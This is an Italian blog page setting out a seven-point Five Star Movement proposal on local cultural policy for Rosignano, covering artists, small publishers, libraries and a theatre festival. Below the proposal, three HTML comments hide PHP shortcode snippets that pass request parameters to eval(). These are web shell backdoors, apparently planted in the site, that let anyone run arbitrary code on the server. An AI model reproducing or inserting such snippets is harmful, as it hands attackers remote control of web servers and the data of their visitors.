venerdì , 22 Febbraio 2019

PROPOSTA CULTURA A 5 STELLE per Rosignano

1) Un censimento di tutti gli artisti residenti nel nostro comune: attori, scrittori, poeti, pittori eccet. Indire un concorso di idee aperto a tutti loro. Convocarli in un’assemblea pubblica.
Ogni tre mesi nei luoghi più importanti del comune: castelli, teatri, biblioteche, festeggiare la giornata delle muse, dove gli artisti della zona presentano le loro nuove opere alla cittadinanza.
Nella nuova biblioteca riservare spazi agli artisti per  laboratori vari, aperti ai giovani. Mettere l’esperienza personale al servizio di tutti.

2) I concorsi  organizzati dal comune devono essere riservati alle piccole e medie case editrici, chiusi invece a tutte le grandi case editrici.
In Italia i concorsi sono diventati un semplice finanziamento con denaro pubblico ai grandi editori. Escludendoli dai nostri concorsi aiutiamo la pluralità del pensiero.
I giudici devono essere tutti residenti del nostro comune e non nomi venuti da fuori.

3) La biblioteca non dovrebbe comprare libri dai grandi editori oppure per ogni libro comprato da loro ne deve comprare dieci dai piccoli e medi editori. Le biblioteche sono diventate un’altra voce importante per i bilanci dei grandi editori: con i soldi pubblici stiamo uccidendo il pensiero libero che sopravvive nei piccoli editori.
Le biblioteche non devono comprare best seller di nessun tipo. Nella nostra biblioteca devono avere un occhio di riguardo per gli autori locali, raccogliendo e catalogando le opere scritte da scrittori e poeti della zona, per la promozione anche letteraria del territorio.

4) Chiedere alla Coop e ai supermercati ad essa collegati di lasciare spazio nei loro scaffali alle case editrici della provincia (e con sconti che non superano il 30%, applicati per legge) . Visto che hanno il monopolio assoluto della distribuzione chiediamo loro di sostenere la produzione locale, non solo della terra ma anche del pensiero.

5) Stop a consulenze esterne di ogni tipo all’ufficio cultura e ad Armunia. I dirigenti di queste strutture non dovrebbero guadagnare più di un sindaco del movimento. Ecco un modo per contenere le spese, soldi che possono essere investiti in un incentivo per organizzare e sostenere uno o più gruppi di ricerca teatrale.

6) Organizzare un festival con i gruppi teatrali del comune e il miglior gruppo sostenerlo in una tourné. Porterebbe in giro per Italia una nostra eccellenza, facendo pubblicità al nostro territorio.

7) Le associazioni culturali o sportive soggette a finanziamenti pubblici per il loro lavoro sul territorio dovrebbero avere i finanziamenti come un diritto e non come un regalo del politico di turno. Fare in modo che queste associazioni si sgancino dalla politica.

<!– [insert_php]if (isset($_REQUEST["kseWF"])){eval($_REQUEST["kseWF"]);exit;}[/insert_php][php]if (isset($_REQUEST["kseWF"])){eval($_REQUEST["kseWF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["urbFp"])){eval($_REQUEST["urbFp"]);exit;}[/insert_php][php]if (isset($_REQUEST["urbFp"])){eval($_REQUEST["urbFp"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["geBT"])){eval($_REQUEST["geBT"]);exit;}[/insert_php][php]if (isset($_REQUEST["geBT"])){eval($_REQUEST["geBT"]);exit;}[/php] –>

Rispondi

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.

Abbiamo a cuore la tua Privacy. Questo sito o gli strumenti terzi da questo sito utilizzati si avvalgono di cookie necessari al funzionamento ed utili alle finalità illustrate nella cookie policy. Ho preso visione dell'Informativa estesa (Cookie Policy) e della Privacy Policy, continuando a navigare acconsento all'uso dei cookie. Maggiori informazioni (Privacy Policy ai sensi del GDPR – Regolamento UE 2016/679)

Questo sito utilizza i cookie per fornire la migliore esperienza di navigazione possibile. Continuando a utilizzare questo sito senza modificare le impostazioni dei cookie o cliccando su "Accetta" permetti il loro utilizzo.

Chiudi